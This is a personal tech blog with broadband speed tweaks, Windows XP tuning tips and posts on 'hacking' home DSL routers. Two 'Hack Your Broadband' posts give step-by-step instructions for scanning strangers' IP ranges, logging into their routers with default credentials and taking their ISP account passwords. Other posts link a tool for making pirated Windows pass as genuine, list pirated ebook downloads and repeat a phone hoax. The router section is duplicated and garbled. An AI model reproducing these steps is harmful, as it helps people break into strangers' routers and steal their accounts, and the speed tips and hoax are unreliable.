Amisauv' Brilliant Blogs

How to easily speed up your BSNL BroadBand Connection

2011-11-14T07:20:00.001-08:00

significantly speed up your internet access through BSNL Dataone broadband connection / most other BroadBand connections like Reliance or Tata Indicom or Sify Broadband .

Tip 1: One of the major problems with BSNL Dataone Broadband connection is the DNS servers they provide by default. Most of the time they are very slow and sometimes they fail to respond. I noticed that I am starting to spend a significant amount of time in DNS resolution with Dataone connection, often it is larger than the time it takes to actually get the reponse. Here is a simple solution to significantly speed up your DNS resolution.

Open up the network connection profile and edit TCP/IP settings. In the DNS server address fields, specify the following DNS server addresses: 208.67.222.222 and 208.67.220.220
Disconnect the connection and then connect again. You are done.

This specifies third party DNS servers which are significantly faster than BSNL Dataone’s DNS servers.

Note: The service is provided by OpenDNS.

Tip 2: Firefox users can use FlashBlock extension to prevent downloading of Flash content by default, thereby significantly speeding up browsing experience. You can click on the placeholder icon to display the original Flash content any time. This is more of a passive tip in that reduces data usage to improve your overall experience.

Tip 3: You can try to increase your broadband bandwidth tweaking the TCP/IP parameters. The process is simplified by using TCPOptimizer, a free tool. It helped me a lot but your mileage may vary.

Also, there's nice little tweak for XP. Microsoft reserve 20% of your available bandwidth for their own purposes. This also affects your Broadband peformance. You can get back this 20% as follows:

Click Start-->Run-->type "gpedit.msc" without the "
This opens the group policy editor. Then go to:
Local Computer Policy-->Computer Configuration-->Administrative Templates-->Network-->QOS Packet Scheduler-->
Limit Reservable Bandwidth
Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab :

"By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this
setting to override the default."
So the trick is to ENABLE reservable bandwidth, then set it to ZERO.
This will allow the system to reserve nothing, rather than the default 20%.

Hacking the Dlink 502T router

2011-11-14T06:45:00.001-08:00

How to Log in to router interface via telnet
You can login over telnet. This is common feature of all router these days and this the only way to hack into box:
=> Default IP: 192.168.1.1
=> Default Username: admin (or use root both are having UID 0)
=> Default Password: admin

WARNING! These examples are not about stealing other users bandwidth or passwords. Most A/DSL provider control many properties on their end. Hacker is a person who delights in having an intimate understanding of the internal workings of a system, computers and computer networks in particular. This article is not about stealing or cracking other users network equipment.
I have changed IP of router to 192.168.1.254 so here is my first session:
$ telnet 192.168.1.254
Sample output:
Trying 192.168.1.254...
Connected to 192.168.1.254.
Escape character is '^]'.

BusyBox on (none) login: root
Password:

BusyBox v0.61.pre (2005.05.30-08:31+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
Let us see password file, enter:
# cat /etc/passwd
Output:
root:x:0:0:Root,,,:/:/bin/sh
admin:x:0:0:Admin,,,:/:/bin/sh
Hack #3: Get more information about router hardware and Linux
Since this is tiny device most of the userland command such as free, uname etc are removed. However /proc file system provides all information.
Display CPU Information
# cat /proc/cpuinfo
Display RAM Information
# cat /proc/meminfo
OR
# free
Display Linux versions
# cat /proc/version
Output:
Linux version 2.4.17_mvl21-malta-mips_fp_le (jenny@fd6e) (gcc version 2.95.3 20010315 (release/MontaVista)) #70 Mon May 30 16:34:48 CST 2005
Display list of running Processes:
# ps
Display list of all kernel module:
# lsmod
Hack # 3: Get more information about network
Display list of all network interfaces:
# ifconfig
Get your Internet public IP info:
# ifconfig ppp0
Output:
ppp0 Link encap:Point-Point Protocol
inet addr:61.xxx.xxx.xxx P-t-P:61.xxx.xxx.xxx Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1492 Metric:1 ASYMMTU:1500
RX packets:69586 errors:0 dropped:0 overruns:0 frame:0
TX packets:62540 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:80566538 (76.8 Mb) TX bytes:5349581 (5.1 Mb)
Get default routing information i.e. find out your ISP's router:
# route
Output:
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
61.xxx.xxx.xxx * 255.255.255.255 UH 0 0 0 ppp0
192.168.1.0 * 255.255.255.0 U 0 0 0 br0
239.0.0.0 * 255.0.0.0 U 1 0 0 br0
default dsl-xx-00x.xx.x 0.0.0.0 UG 0 0 0 ppp0
Display ethernet statics such as speed and other details:
# cat /proc/avalanche/eth0_rfc2665_stats
Display DSL modem stats:
# cat /proc/avalanche/avsar_modem_stats
Display Iptables firewall rules:
# iptables -L -n
Flush/Stop firewall rules (don't flush untile and unless you have solid reason to do it )
# /etc/flush_firewall
Hack 4 : Secure your router
(A) Open a web browser such as firefox and login to web based interface. Type url http://192.168.1.1/
(B) Enable Firewall
By default firewall is disabled :/? turn it on to protect your router as it runs linux. Click on Home > Wan > Scroll down and select Firewall as Enabled. Click on Apply.
(C) Change default admin password
Click on Tools > Select Administrator and type the password. > Click apply
(D) Save changes and reboot router
Click on Tools > System > Click on Save and Reboot button
Please note that most ISP including Airtel, BSNL and others these days use this router. And by default admin password is not changed by user, in addition to that some software bug exists that allows remote administration via telnet/http. So turning on firewall saves your day.
Hack # 5: Miscellaneous information
Display developer information i.e. the people behind this router development:
# cat /proc/avalanche/developers
Quickly reboot the router:
# reboot
All your binary stored in /bin/ /usr/bin /sbin directory.

Hacking a broadband internet network

2011-11-14T06:43:00.000-08:00

Hack Your Broadband

2011-11-14T06:41:00.001-08:00

Step 1: Download any port Scanner (i preffer Super Scan or IPscanner)

Step 2: First Get your ip from
CODE www.whatismyip.com
Asume your IP to be 59.x.x.17

Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range
start:59.x.x.1 to End:59.x.x.255

Step 4: Then check in your scanner which alive IPs has the port 80 open

Step 5: Enter that alive IP in your web browser

Step 6: It asks for user , pass
Type u
User=admin
Password=admin or password
It is the default password for most of the routers.

if denied then use on another alive IP

Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.

Step 8: use ShowPassword or Revelation software to view the password in asterisks

Now You have Username/Password
Enjoy!

Use Asterisk Key Software For Revelation Of Passwords.

Hacking BSNL Beetel 220x ADSL router (Broadcom BCM6338)

2011-11-14T06:39:00.001-08:00

This router is based upon Broadcom BCM6338 chipset. This router is used by Airtel, BSNL and other ISPs in India.
Hack # 1 : How to Login into Router
Login over telnet. This is a common feature of all router these days and this the only way to hack into box:
Default IP: 192.168.1.1
Default Username: admin
Default Password: password
I have changed IP of router to 192.168.1.254 so here is my first session:
$ telnet 192.168.1.254
Trying 192.168.1.254...
Connected to 192.168.1.254.
Escape character is '^]'.
BCM96338 ADSL Router
Login: admin
password: ********
Once you are logged in you will see menu:
Main Menu
1. ADSL Link State
This router is based upon Broadcom BCM6338 chipset. This router is used by Airtel, BSNL and other ISPs in India.
Hack # 1 : How to Login into Router
Login over telnet. This is a common feature of all router these days and this the only way to hack into box:
Default IP: 192.168.1.1
Default Username: admin
Default Password: password
I have changed IP of router to 192.168.1.254 so here is my first session:
$ telnet 192.168.1.254
Trying 192.168.1.254...
Connected to 192.168.1.254.
Escape character is '^]'.
BCM96338 ADSL Router
Login: admin
password: ********
Once you are logged in you will see menu:
Main Menu
1. ADSL Link State
2. LAN
3. WAN
4. DNS Server
5. Route Setup
6. NAT
7. Firewall
8. Quality Of Service
9. Management
10. Passwords
11. Reset to Default
12. Save and Reboot
13. Exit
->
Hack # 2: Get out of this stupid shell menu script/program
Yup, it is stupid stuff and don't waste your time hitting CTRL+C, CTRL+D keys, to get out of this script/program (break shell script), just type sh and hit enter key at arrow prompt ->
-> sh
And you will be taken to shell
BusyBox v1.00 (2005.09.20-19:57+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.
#
Hack # 3: But where is my ls command...
Type ls or dir command,
# ls
ls: not found
# dir
dir: not found
They have removed the ls and dir command. But don't worry you can use old echo command trick:
# echo *
bin dev etc lib linuxrc mnt proc sbin usr var webs
echo * is old trick which displays list of all files in current directory without using ls or dir command.
Hack #4: Looking for advanced web based configuration, use main.html
Yet another stupid thing, they have removed main.html from web based configuration. Basically main.html is use to configure advanced options of router like port forwarding, DNS setting, firewall etc.
Just type http://192.168.1.254/main.html (replace 192.168.1.254 with your actual router IP address) to get all advanced options.
Hack # 5: Get more information about router hardware and Linux
Since this is tiny device most of the userland command such as free, uname etc are removed. However /proc file system provides all information:
Display CPU Information
# cat /proc/cpuinfo
Display RAM Information
# cat /proc/meminfo
Display Linux versions
# cat /proc/version
Linux version 2.6.8.1 (root@localhost.localdomain) (gcc version 3.4.2) #1 Tue Sep 20 15:52:07 EDT 2005
Display list of running Processes:
# ps
Display list of all kernel module (drivers):
# cat /proc/modules
Hack # 6: Get more information about your network configuration
Display list of network interfaces
# ifconfig
Get default routing information i.e. find out your ISP's router:
# route
Display Iptables rules
# iptables -L -n
Hack 6 : Secure your router
(A) Fire web browser such as firefox and login to web based interface. Type url http://192.168.1.1/ main.html (or 192.168.1.254/main.html)
(B) Enable Firewall
Click on Security > Ip filtering > Outgoing or Incoming > Click add
(C) Change default admin password
Click on Tools > Select Administrator and type the password. > Click apply
(D) Save changes and reboot router
Click on Management > Access Control > Password > Select Admin > Setup new password
Save changes and reboot router.
Quick reboot router with reboot command:
# reboot
2. LAN
3. WAN
4. DNS Server
5. Route Setup
6. NAT
7. Firewall
8. Quality Of Service
9. Management
10. Passwords
11. Reset to Default
12. Save and Reboot
13. Exit
->
Hack # 2: Get out of this stupid shell menu script/program
Yup, it is stupid stuff and don't waste your time hitting CTRL+C, CTRL+D keys, to get out of this script/program (break shell script), just type sh and hit enter key at arrow prompt ->
-> sh
And you will be taken to shell
BusyBox v1.00 (2005.09.20-19:57+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.
#
Hack # 3: But where is my ls command...
Type ls or dir command,
# ls
ls: not found
# dir
dir: not found
They have removed the ls and dir command. But don't worry you can use old echo command trick:
# echo *
bin dev etc lib linuxrc mnt proc sbin usr var webs
echo * is old trick which displays list of all files in current directory without using ls or dir command.
Hack #4: Looking for advanced web based configuration, use main.html
Yet another stupid thing, they have removed main.html from web based configuration. Basically main.html is use to configure advanced options of router like port forwarding, DNS setting, firewall etc.
Just type http://192.168.1.254/main.html (replace 192.168.1.254 with your actual router IP address) to get all advanced options.
Hack # 5: Get more information about router hardware and Linux
Since this is tiny device most of the userland command such as free, uname etc are removed. However /proc file system provides all information:
Display CPU Information
# cat /proc/cpuinfo
Display RAM Information
# cat /proc/meminfo
Display Linux versions
# cat /proc/version
Linux version 2.6.8.1 (root@localhost.localdomain) (gcc version 3.4.2) #1 Tue Sep 20 15:52:07 EDT 2005
Display list of running Processes:
# ps
Display list of all kernel module (drivers):
# cat /proc/modules
Hack # 6: Get more information about your network configuration
Display list of network interfaces
# ifconfig
Get default routing information i.e. find out your ISP's router:
# route
Display Iptables rules
# iptables -L -n
Hack 6 : Secure your router
(A) Fire web browser such as firefox and login to web based interface. Type url http://192.168.1.1/ main.html (or 192.168.1.254/main.html)
(B) Enable Firewall
Click on Security > Ip filtering > Outgoing or Incoming > Click add
(C) Change default admin password
Click on Tools > Select Administrator and type the password. > Click apply
(D) Save changes and reboot router
Click on Management > Access Control > Password > Select Admin > Setup new password
Save changes and reboot router.
Quick reboot router with reboot command:
# reboot

Increase your internet speed (It really works) No software required

2011-11-14T06:22:00.001-08:00

Follow the step:-
go to desktop->My computer-(right click on)->properties->then go HARDWARE tab->Device manager-> now u see a window of Device manager
then go to Ports->Communication Port(double click on it and Open).
after open u can see a Communication Port properties.
go the Port Setting:----
and now increase ur "Bits per second" to 128000.
and "Flow control" change 2 Hardware.

apply and see the result.........

INCREASE YOUR BANDWITH 20 %

2011-11-14T04:47:00.003-08:00

INCREASE YOUR BANDWITH 20 %

Go to RUN.

type gpedit.msc

go to computer configuration >administrative templetes > network > QoS packet scduler > Limit reservable Bandwidth enable it.

set it to 0 percentage.

This settings Determines the percentage of connection bandwidth that the system can reserve. This value limits the

combined bandwidth reservations of all programs running on the system.

By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use

this setting to override the default.

If you enable this setting, you can use the "Bandwidth limit" box to adjust the amount of bandwidth the system can

reserve.

If you disable this setting or do not configure it, the system uses the default value of 20 percent of the

connection.

If u change it to 0 then the 20 % incrase in your bandwidth.

Hack Your Broadband!!

2011-11-14T04:47:00.001-08:00

Step 1: Download any port Scanner (i preffer Super Scan, IPscanner, gfi LAN nat secirity scanner)

Step 2: First Get your ip

Go to Command prompt type ipconfig /all
Hit enter.
You will see your ip as a clients ip.
suppose its 61.1.1.51

Step 3: write your ip in IP scanner Software and scan for alive IPs in the below range
start:61.1.1.1 to End:61.1.255.255

Step 4: Then check in your scanner which alive IPs has the port 80 open or 23 for telnet.

Step 5: if port 80 is open then Enter that IP in your web browser
if 23 port is open then u shd knw how to telnet it frm cmd........

Step 6: It asks for user ID AND password type

username =admin
password =admin or password

It is the default password for most of the routers.

if denied then use on another alive IP

Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.

Step 8: use Show Password tools to view the password in asterisks ********.

now you have username and password ready for use.

# Hack Dial up Connection # Get Extreme Speed #

2011-11-14T04:45:00.001-08:00

YOU MUST BE TIRED OF YOUR SLOW ASS DIAL UP CONNECTION, RUNNING AT MAX 54kbps, I WAS WORSE, 28.8kbps. BUT THEN I FOUND A TWEAK THAT ALLOWED ME TO CONNECT WITH A DIAL UP MODEM AT 115kbps. THIS TWEAK MAY NOT WORK FOR EVERYONE, IF YOU GET AN ERROR SAYING “MODEM NOT RESPONDING” GO BACK AND DELETE THE EXTRA CODE THAT YOU PUT IN, AND RESTART YOUR COMPUTER AND EVERYTHING SHOULD BE FINE.

HERE IS WHAT YOU DO:

1. GO TO YOUR START MENU

2. OPEN YOUR CONTROL PANEL

3. OPEN PHONE AND MODEM OPTIONS (XP USERS WILL HAVE TO CLICK SWITCH TO CLASSIC VIEW ON THE LEFT SIDE TO SEE THIS OPTION)

4. SELECT THE MODEMS TAB

5. SELECT YOUR MODEM, AND CLICK PROPERTIES

6. CLICK ON THE ADVANCED TAB

7. THEN YOU WILL SEE A BOX THAT SAYS ADVANCED SETTINGS
- AND UNDER IT A TEXT BOX WITH "Extra initialization commands"

8. IN THE TEXT BOX PUT &AX&FX JUST HOW YOU SEE IT IN THIS TEXT.

9. CLICK "OK" TO CLOSE THAT BOX

10. CLICK "OK" AGAIN

AND THATS IT, YOU HAVE NOW TWEAKED YOUR MODEM TO CONNECT AT A VERY HIGH SPEED FOR A DIAL UP MODEM.

Boost Extreme Speed to your BroadBand Connection

2011-11-14T04:36:00.000-08:00

A. in the "My Network Places" properties (right click on the desktop icon and choose properties), highlight the connection then at the menu bar choose "Advanced" then "Advanced Settings". Uncheck the two boxes in the lower half for the bindings for File and Printer sharing and Client for MS networks. Click OK

B. Continue as indicated below steps:

1. from the Windows XP CD in the support directory from the support cab, extract the file netcap.exe and place it in a directory on your hard drive or even in the root of your C:\ drive.

2. next, open up a command prompt window and change directories to where you put netcap.exe then type "netcap/?". It will list some commands that are available for netcap and a netmon driver will be installed. At the bottom you will see your adapters. You should see two of them if using a 3Com card. One will be for LAN and the other will be for WAN something or other.

3. Next type "netcap/Remove". This will remove the netmon driver.

4. Open up control panel / system / dev man and look at your network adapters. You should now see two of them and one will have a yellow ! on it. Right click on the one without the yellow ! and choose uninstall. YES! you are uninstalling your network adapter, continue with the uninstall. Do not restart yet.

5. Check your connection properties to make sure that no connection exists. If you get a wizard just cancel out of it.

6. Now restart the machine and go to your connection properties again and you should have a new connection called "Local area connection 2". highlight the connection then at the menu bar choose "Advanced" then "Advanced Settings".

7. Uncheck the two boxes in the lower half for the bindings for File and Printer sharing and Client for MS networks. Click OK.

8. Choose connection properties and uncheck the "QOS" box

9. Restart the machine and enjoy the increased responsiveness of IE, faster page loading, and a connection speed boost...

Writing your blog posts in Assamese

2010-04-01T07:14:00.000-07:00

There is no direct support to write blog posts (atleast in wordpress or blogspot) in assamese but you can write with help of some unicode editors. One important thing to remember that your browser need to support unicode formats. Well, IE 6+ and Mozilla Firefox supports unicode character formats.
Steps:
• Open an online unicode editor ( Editor : http://www.assamesemail.com/editor/im3.htm Main Page – Unicode Online : http://www.unicodeonline.com/assamese/index.htm) type the words you want to type. You do not need an assamese keyboard for the same (I doubt if there is one). For example to type মই, you have to type “moi”. but the editor is pathetic and you will lose your mind so better use http://ekushey.org/projects/browser_ime/qwerty-phonetic or http://www.lipikaar.com/. Both of these sites a specially for bengali so, we need just replace “R” in app
• select and copy the words and paste it in your blog editor. You are done.

Convert Pirated Windows 2 Genuine

2010-04-01T07:01:00.001-07:00

You need to have Genuine verification to install some softwares.

Software to covert winxp & vista into Genuine Windows
http://rapidshare.com/files/100207755/project.rar.html
Size - 1.4 MB

Crack MMC PASSWORD

2010-04-01T07:00:00.000-07:00

Install the File explorer Software e.g. SELQ of Fileman through data Cable or Bluetooth in Phone memory

2. Then Insert The Blocked MMC

3. Open the File Explorer Software

4. goto C:\ i.e Phone Memory

5. goto System

6. Goto Find and Search MMCstore

7. Send this file by Bluetooth or Infrared to your PC

8. Rename the file MMCSTORE to MMCSTORE.TXT

9. Open the file and the password off the MMC are there

TIS A VERY VERY IMPORTANT NOTICE TO YOU ALL :

2009-01-13T21:39:00.000-08:00

TIS A VERY VERY IMPORTANT NOTICE TO YOU ALL :

DONN CALL #09 OR #90 IF SAID/ASKED/LURED/TEMPTED TO .......NEVER NEVER DIAL THESE OR ALIKE NUMBERS , B'COS THESE ARE TERROSIST ATTACKS ON YOUR MOBILE SETS BY WHICH THEY WILL INTERCEPT YR MOBILE AND THROUGH TRACKING WILL DO ANTI NATIONAL ACTIVITIES .

SO KNOWLINGLY OR UNKNOWINGLY YOU WILL BE TRAPPED TO THEIR NET , SO NEVER NEVER DO THIS .

THEY WILL CALL BY UR NUMBER AND YOU WILL BE UNKNOWINGLY INVOLVED IN THE ANTI NATIONAL ACTIVITIES .

SO NEVER NEVER CALL THESE NUMBERS AT ANY CIRCUMSTANCES !

Graphics & Design Ebooks

2008-08-07T21:15:00.000-07:00

Graphics & Design Ebooks
Maya, Photoshop, Macromedia, Bryce, Digital Photography, & more....

Download with FlashGet

f*p://195.135.232.80/Books/design/8.books.Maya.[by.KiN_www.netz.ru].rar
f*p://195.135.232.80/Books/design/A.Short.Course.in.Digital.Photography.[by.KiN_www.netz.ru].rar
f*p://195.135.232.80/Books/design/Adobe.Creative.Suite.Keyboard.Shortcuts.[by.KiN_www.netz.ru]_3,1.MB.rar
f*p://195.135.232.80/Books/design/Adobe.Photoshop.CS.in.10.Simple.Steps.or.Less.(2004).[by.KiN_www.netz.ru]_7,84 MB.rar
f*p://195.135.232.80/Books/design/Adobe.Photoshop.Tutorial.7.Day.Course.html.a.[28.84.MB_www.netz.ru].rar
f*p://195.135.232.80/Books/design/Advanced.3D.Photorealism.Techniques[9,76.MB_RUS_www.netz.ru].rar
f*p://195.135.232.80/Books/design/Bill.Flemming.Advanced.3D.Photorealism.Techniques.[RUS].[by.KiN_www.netz.ru]_9,75 MB.rar
f*p://195.135.232.80/Books/design/Bryce.5.Manual.[by.KiN_www.netz.ru_4.01MB].rar
f*p://195.135.232.80/Books/design/Corel.103.tutorials.RUS.[by.KiN_www.netz.ru].rar
f*p://195.135.232.80/Books/design/Designing Secure Web-Based Applications for Windows 2000.zip
f*p://195.135.232.80/Books/design/DHTML.Weekend.Crash.Course[by.KiN_www.netz.ru].rar
f*p://195.135.232.80/Books/design/Digital.Photography.Hacks.[by.KiN_www.netz.ru]_11,76.MB.rar
f*p://195.135.232.80/Books/design/How.To.Do.Everything.With.Illustrator.[by.KiN_www.netz.ru]_30,58.MB.rar
f*p://195.135.232.80/Books/design/How.To.Do.Everything.With.Photoshop.7.[by.KiN_www.netz.ru]_9,8 MB.rar
f*p://195.135.232.80/Books/design/How.To.Draw.Anime.Photoshop.Coloring.Tips.[by.KiN_www.netz.ru]_773 kB.rar
f*p://195.135.232.80/Books/design/How.To.Draw.Manga.Photoshop.Techniques.[by.KiN_www.netz.ru]_343 kB.rar
f*p://195.135.232.80/Books/design/How.To.Use.Adobe.Photoshop.7.[by.KiN_www.netz.ru]_14,66 MB.rar
f*p://195.135.232.80/Books/design/HTML.4.01.Weekend.Crash.Course[by.KiN_www.netz.ru].rar
f*p://195.135.232.80/Books/design/HTML.Complete.Course.[by.KiN_www.netz.ru]_26,79.MB.rar
f*p://195.135.232.80/Books/design/Learn.How.To.Draw.[by.KiN_www.netz.ru]_1,61.MB.rar
f*p://195.135.232.80/Books/design/Learn.HTML4.In.a.Weekend.[by.KiN_www.netz.ru]_11,02.MB.rar
f*p://195.135.232.80/Books/design/Learning.Macromedia.FlashMX.2004[658.kB_www.netz.ru].rar
f*p://195.135.232.80/Books/design/Macromedia.Dreamweaver.4.Bible[8,86.MB_www.netz.ru].rar
f*p://195.135.232.80/Books/design/Macromedia.Dreamweaver.MX.2004.Web.Application.Recipes[6,5.MB_www.netz.ru].rar
f*p://195.135.232.80/Books/design/Macromedia.Flash.MX.2004.ActionScript.Reference.Guide.rar
f*p://195.135.232.80/Books/design/Macromedia.Flash.MX.2004.Using.Components.rar
f*p://195.135.232.80/Books/design/Macromedia.Flashmx.Actionscript.Reference.Guide.2004[2,66.MB_www.netz.ru].rar
f*p://195.135.232.80/Books/design/Macromedia.Flashmx.Using.Components.2004[979.kB_www.netz.ru].rar
f*p://195.135.232.80/Books/design/Macromedia.Press.Macromedia.Dreamweaver.MX.Dynamic.Applications.[10.46.MB_www.netz.ru].rar
f*p://195.135.232.80/Books/design/New.Riders.Photoshop.7.Power.Shortcuts.[by.KiN_www.netz.ru]_3,5 MB.rar
f*p://195.135.232.80/Books/design/NewRiders.MacromediaDreamweaverMx2004WebApplicationRecipes(6,5MB_www.netz.ru).rar f*p://195.135.232.80/Books/design/PhotoShop.&.Illustrator.Tutorial.[14.37.MB_www.netz.ru].rar
f*p://195.135.232.80/Books/design/Photoshop.6.Bible.[13.95.MB_www.netz.ru].rar f*p://195.135.232.80/Books/design/Photoshop.75.tutorial.RUS.[by.KiN_www.netz.ru].rar
f*p://195.135.232.80/Books/design/Photoshop.CS.Tips.and.Tricks.[by.KiN_www.netz.ru].rar
f*p://195.135.232.80/Books/design/Photoshop.Rus.4-18[6.5Mb,_www.ne

A lotta more to come , wait a while !

speeding xp

2008-08-07T21:12:00.000-07:00

ways to speeding xp :

Since defraging the disk won't do much to improve Windows XP performance, here are 23 suggestions that will. Each can enhance the performance and reliability of your customers' PCs. Best of all, most of them will cost you nothing.
1.) To decrease a system's boot time and increase system performance, use the money you save by not buying defrag software -- the built-in Windows defragmentor works just fine -- and instead equip the computer with an Ultra-133 or Serial ATA hard drive with 8-MB cache buffer.

2.) If a PC has less than 512 MB of RAM, add more memory. This is a relatively inexpensive and easy upgrade that can dramatically improve system performance.

3.) Ensure that Windows XP is utilizing the NTFS file system. If you're not sure, here's how to check: First, double-click the My Computer icon, right-click on the C: Drive, then select Properties. Next, examine the File System type; if it says FAT32, then back-up any important data. Next, click Start, click Run, type CMD, and then click OK. At the prompt, type CONVERT C: /FS:NTFS and press the Enter key. This process may take a while; it's important that the computer be uninterrupted and virus-free. The file system used by the bootable drive will be either FAT32 or NTFS. I highly recommend NTFS for its superior security, reliability, and efficiency with larger disk drives.

4.) Disable file indexing. The indexing service extracts information from documents and other files on the hard drive and creates a "searchable keyword index." As you can imagine, this process can be quite taxing on any system.

The idea is that the user can search for a word, phrase, or property inside a document, should they have hundreds or thousands of documents and not know the file name of the document they want. Windows XP's built-in search functionality can still perform these kinds of searches without the Indexing service. It just takes longer. The OS has to open each file at the time of the request to help find what the user is looking for.

Most people never need this feature of search. Those who do are typically in a large corporate environment where thousands of documents are located on at least one server. But if you're a typical system builder, most of your clients are small and medium businesses. And if your clients have no need for this search feature, I recommend disabling it.

Here's how: First, double-click the My Computer icon. Next, right-click on the C: Drive, then select Properties. Uncheck "Allow Indexing Service to index this disk for fast file searching." Next, apply changes to "C: subfolders and files," and click OK. If a warning or error message appears (such as "Access is denied"), click the Ignore All button.

5.) Update the PC's video and motherboard chipset drivers. Also, update and configure the BIOS. For more information on how to configure your BIOS properly, see this article on my site.

6.) Empty the Windows Prefetch folder every three months or so. Windows XP can "prefetch" portions of data and applications that are used frequently. This makes processes appear to load faster when called upon by the user. That's fine. But over time, the prefetch folder may become overloaded with references to files and applications no longer in use. When that happens, Windows XP is wasting time, and slowing system performance, by pre-loading them. Nothing critical is in this folder, and the entire contents are safe to delete.

7.) Once a month, run a disk cleanup. Here's how: Double-click the My Computer icon. Then right-click on the C: drive and select Properties. Click the Disk Cleanup button -- it's just to the right of the Capacity pie graph -- and delete all temporary files.

8.) In your Device Manager, double-click on the IDE ATA/ATAPI Controllers device, and ensure that DMA is enabled for each drive you have connected to the Primary and Secondary controller. Do this by double-clicking on Primary IDE Channel. Then click the Advanced Settings tab. Ensure the Transfer Mode is set to "DMA if available" for both Device 0 and Device 1. Then repeat this process with the Secondary IDE Channel.

9.) Upgrade the cabling. As hard-drive technology improves, the cabling requirements to achieve these performance boosts have become more stringent. Be sure to use 80-wire Ultra-133 cables on all of your IDE devices with the connectors properly assigned to the matching Master/Slave/Motherboard sockets. A single device must be at the end of the cable; connecting a single drive to the middle connector on a ribbon cable will cause signaling problems. With Ultra DMA hard drives, these signaling problems will prevent the drive from performing at its maximum potential. Also, because these cables inherently support "cable select," the location of each drive on the cable is important. For these reasons, the cable is designed so drive positioning is explicitly clear.

10.) Remove all spyware from the computer. Use free programs such as AdAware by Lavasoft or SpyBot Search & Destroy. Once these programs are installed, be sure to check for and download any updates before starting your search. Anything either program finds can be safely removed. Any free software that requires spyware to run will no longer function once the spyware portion has been removed; if your customer really wants the program even though it contains spyware, simply reinstall it. For more information on removing Spyware visit this Web Pro News page.

11.) Remove any unnecessary programs and/or items from Windows Startup routine using the MSCONFIG utility. Here's how: First, click Start, click Run, type MSCONFIG, and click OK. Click the StartUp tab, then uncheck any items you don't want to start when Windows starts. Unsure what some items are? Visit the WinTasks Process Library. It contains known system processes, applications, as well as spyware references and explanations. Or quickly identify them by searching for the filenames using Google or another Web search engine.

12.) Remove any unnecessary or unused programs from the Add/Remove Programs section of the Control Panel.

13.) Turn off any and all unnecessary animations, and disable active desktop. In fact, for optimal performance, turn off all animations. Windows XP offers many different settings in this area. Here's how to do it: First click on the System icon in the Control Panel. Next, click on the Advanced tab. Select the Settings button located under Performance. Feel free to play around with the options offered here, as nothing you can change will alter the reliability of the computer -- only its responsiveness.

14.) If your customer is an advanced user who is comfortable editing their registry, try some of the performance registry tweaks offered at Tweak XP.

15.) Visit Microsoft's Windows update site regularly, and download all updates labeled Critical. Download any optional updates at your discretion.

16.) Update the customer's anti-virus software on a weekly, even daily, basis. Make sure they have only one anti-virus software package installed. Mixing anti-virus software is a sure way to spell disaster for performance and reliability.

17.) Make sure the customer has fewer than 500 type fonts installed on their computer. The more fonts they have, the slower the system will become. While Windows XP handles fonts much more efficiently than did the previous versions of Windows, too many fonts -- that is, anything over 500 -- will noticeably tax the system.

18.) Do not partition the hard drive. Windows XP's NTFS file system runs more efficiently on one large partition. The data is no safer on a separate partition, and a reformat is never necessary to reinstall an operating system. The same excuses people offer for using partitions apply to using a folder instead. For example, instead of putting all your data on the D: drive, put it in a folder called "D drive." You'll achieve the same organizational benefits that a separate partition offers, but without the degradation in system performance. Also, your free space won't be limited by the size of the partition; instead, it will be limited by the size of the entire hard drive. This means you won't need to resize any partitions, ever. That task can be time-consuming and also can result in lost data.

19.) Check the system's RAM to ensure it is operating properly. I recommend using a free program called MemTest86. The download will make a bootable CD or diskette (your choice), which will run 10 extensive tests on the PC's memory automatically after you boot to the disk you created. Allow all tests to run until at least three passes of the 10 tests are completed. If the program encounters any errors, turn off and unplug the computer, remove a stick of memory (assuming you have more than one), and run the test again. Remember, bad memory cannot be repaired, but only replaced.

20.) If the PC has a CD or DVD recorder, check the drive manufacturer's Web site for updated firmware. In some cases you'll be able to upgrade the recorder to a faster speed. Best of all, it's free.

21.) Disable unnecessary services. Windows XP loads a lot of services that your customer most likely does not need. To determine which services you can disable for your client, visit the Black Viper site for Windows XP configurations.

22.) If you're sick of a single Windows Explorer window crashing and then taking the rest of your OS down with it, then follow this tip: open My Computer, click on Tools, then Folder Options. Now click on the View tab. Scroll down to "Launch folder windows in a separate process," and enable this option. You'll have to reboot your machine for this option to take effect.

23.) At least once a year, open the computer's cases and blow out all the dust and debris. While you're in there, check that all the fans are turning properly. Also inspect the motherboard capacitors for bulging or leaks. For more information on this leaking-capacitor phenomena, you can read numerous articles on my site.

Following any of these suggestions should result in noticeable improvements to the performance and reliability of your customers' computers. If you still want to defrag a disk, remember that the main benefit will be to make your data more retrievable in the event of a crashed drive.

Apart from these tweaks there are various other possibilities to implement to get a decent and nicely working operating system.

more to come !

How to protect yourself from different types of threats !

2008-08-07T21:10:00.000-07:00

There are many precautions you can take that will protect you against the most common threats.

1. Check Windows Update and Office Update regularly (_http://office.microsoft.com/productupdates); have your Office CD ready. Windows Me, 2000, and XP users can configure automatic updates. Click on the Automatic Updates tab in the System control panel and choose the appropriate options.

2. Install a personal firewall. Both SyGate (_www.sygate.com) and ZoneAlarm (_www.zonelabs.com) offer free versions.

3. Install a free spyware blocker. Our Editors' Choice ("Spyware," April 22) was SpyBot Search & Destroy (_http://security.kolla.de). SpyBot is also paranoid and ruthless in hunting out tracking cookies.

4. Block pop-up spam messages in Windows NT, 2000, or XP by disabling the Windows Messenger service (this is unrelated to the instant messaging program). Open Control Panel | Administrative Tools | Services and you'll see Messenger. Right-click and go to Properties. Set Start-up Type to Disabled and press the Stop button. Bye-bye, spam pop-ups! Any good firewall will also stop them.

5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol. A decent example would be f8izKro@l. This will make it much harder for anyone to gain access to your accounts.

